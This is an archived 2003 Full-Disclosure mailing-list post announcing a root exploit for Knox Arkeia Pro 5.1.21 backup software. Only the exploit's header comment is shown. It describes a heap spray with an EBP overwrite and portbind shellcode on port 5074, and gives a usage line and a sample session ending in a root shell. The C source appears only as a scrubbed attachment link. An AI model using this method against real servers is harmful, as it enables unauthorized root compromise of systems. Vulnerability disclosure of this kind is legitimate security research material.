lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
From: bugtraq_vuln at yahoo.com (A. C.)
Subject: Knox Arkeia 5.1.21 local/remote root exploit

Exploit attached for Knox Arkeia Pro v5.1.21 backup
software from http://www.arkeia.com.

 
 

/*
 * Knox Arkiea arkiead local/remote root exploit.
 *
 * Portbind 5074 shellcode
 *
 * Tested on Redhat 8.0, Redhat 7.2, but all versions
are presumed vulnerable.
 * 
 * NULLs out least significant byte of EBP to pull EIP
out of overflow buffer.
 * A previous request forces a large allocation of
NOP's + shellcode in heap
 * memory.  Find additional targets by searching the
heap for NOP's after a 
 * crash.  safeaddr must point to any area of memory
that is read/writable
 * and won't mess with program/shellcode flow. 
 *
 * ./ark_sink host targetnum 
 * [user@...t dir]$ ./ark_sink 192.168.1.2 1
 * [*] Connected to 192.168.1.2:617
 * [*] Connected to 192.168.1.2:617
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Sending overflow
 * [*] Done
 * [*] Sleeping and connecting remote shell
 * [*] Connected to 192.168.1.2:5074
 * [*] Success, enjoy
 * id
 * uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *
 */ 

 


__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ark_sink.c
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030919/ab22d1b4/ark_sink.c

Powered by blists - more mailing lists